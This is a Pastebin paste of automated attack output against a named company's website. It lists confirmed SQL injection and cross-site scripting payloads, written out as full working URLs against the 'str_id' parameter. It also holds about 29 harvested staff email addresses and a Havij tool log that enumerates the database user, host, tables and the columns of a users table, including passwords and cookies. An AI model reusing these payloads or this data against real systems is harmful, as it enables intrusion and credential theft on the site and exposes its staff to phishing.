Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- URL: http://www.azd.cz/?str_id='"--></style></script><script>alert(0x001AFA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x001AFA)</script>
- ||| Database Error Message
- Severity: Low
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| MySQL Database Identified
- Severity : Information
- Confirmation : Confirmed
- URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation : Confirmed
- Found E-mails:
- chrdle.zdenek@azd.cz
- zatecky.petr@azd.cz
- sovak.miloslav@azd.cz
- kampik.vladimir@azd.cz
- kozak.miroslav@azd.cz
- hora.miroslav@azd.cz
- faltus.petr@azd.cz
- ketner.vladimir@azd.cz
- jurik.roman@azd.cz
- batka.jiri@azd.cz
- sima.radomir@azd.cz
- dlabaja.jiri@azd.cz
- vyskocilova.olga@azd.cz
- tuckova.ludmila@mzpazd.cz
- horelova.lenka@azd-kolin.cz
- matlasova.alena@azdmzo.cz
- miklikova.hana@azdvzb.cz
- cudovska.blanka@azdvzo.cz
- klvackova.marie@azdzoz.cz
- weisgerber.josef@azd.cz
- zraly.roman@azd.cz
- zaleski.vaclav@azd.cz
- zetkova.vera@azd.cz
- drbohlav.jan@azd.cz
- novak.vlastimil@azd.cz
- seidl.ladislav@azd.cz
- vedra.jiri@azd.cz
- sverepa.milan@azd.cz
- info@dega.cz
- ||| Test - Havij
- - Small warning ! ( The program did not load data or items are not in any database data :D )
- Target: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- DB Server: MySQL
- Resp. Time(avg): 3243 ms
- Current User: azd_cz@localhost
- DBMS Version: 5.0.89
- Current DB: azd_cz_db
- System User: azd_cz@localhost
- Host Name: doyle.netservis.cz
- DB User: 'azd_cz'@'localhost'
- Data Bases: information_schema, azd_cz_db
- Keyword defined by user: Duplicate
- Injection type is Integer
- Current DB: azd_cz_db
- Count(table_name) of information_schema.tables where table_schema=0x617A645F637A5F6462 is 75
- Table found: archAnkety
- Table found: pages
- Table found: pages_language_overlay
- Table found: refKML
- Table found: sysEmaily
- Table found: sysFoots
- Table found: sysPageMenu
- Table found: sysPhotos
- Table found: sysStyles
- Table found: sysUsers
- Table found: sys_refindex
- Table found: tabAkce
- Table found: tabAkce_meta
- Table found: tabAktuality
- Table found: tabAnkety
- Table found: tabAnketyMoznosti
- Table found: tabAntiBF
- Table found: tabCache
- Table found: tabCacheURL
- Table found: tabClanky
- Table found: tabConfig
- Table found: tabDPH
- Table found: tabDiskuse
- Table found: tabDiskusePrispevky
- Table found: tabEmaily
- Table found: tabFormulare
- Table found: tabFormulareEmaily
- Table found: tabFormulareOdeslane
- Table found: tabFormularePole
- Table found: tabFormulareStranky
- Table found: tabFotografie
- Table found: tabGM
- Table found: tabGMbod
- Table found: tabGMtypBodu
- Table found: tabHP
- Table found: tabKatalogy
- Table found: tabLanguages
- Table found: tabModuly
- Table found: tabNewsletter
- Table found: tabObrazky
- Table found: tabOperace
- Table found: tabOpravneni
- Table found: tabOpravneniDefinice
- Table found: tabPrihlaseni
- Table found: tabProdukty
- Table found: tabProduktySoubory
- Table found: tabReWriteID
- Table found: tabRegistrovani
- Table found: tabRssMirror
- Table found: tabStatistikaFulltext
- Table found: tabStranky
- Table found: tabStranky2
- Table found: tabVideoNastaveni
- Table found: tabVyrazy
- Table found: tabVyrazyPreklad
- Table found: tieAkceSouvisejici
- Table found: tieAkceSouvisejiciClanky
- Table found: tieClankySouvisejici
- Table found: tieNewsletterAkceEmaily
- Table found: tieNewsletterClanky
- Table found: tieOpravneniModuly
- Table found: tieOpravneniStranky
- Table found: tieOpravneniUzivatele
- Table found: tieProduktySouvisejici
- Table found: tieRoleUzivatele
- Table found: tieStrankyAkce
- Table found: tieStrankyAktuality
- Table found: tieStrankyClanky
- Table found: tieStrankyProdukty
- Table found: tt_content
- Table found: tt_news
- Table found: tx_dam
- Table found: tx_dam_cat
- Table found: tx_dam_mm_cat
- Table found: viewStrankyNadrazene
- azd_cz_db.sysUsers
- Count(column_name) of information_schema.columns where table_schema=0x617A645F637A5F6462 and table_name=0x7379735573657273 is 17
- Column found: ID
- Column found: User
- Column found: Password
- Column found: Name
- Column found: LName
- Column found: Phone
- Column found: Email
- Column found: Active
- Column found: NTAdmin
- Column found: Registrace
- Column found: Od
- Column found: Do
- Column found: Access
- Column found: LastIP
- Column found: LastCookie
- Column found: Login
- Column found: Poznamka
- For more fortune to the database for you ..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement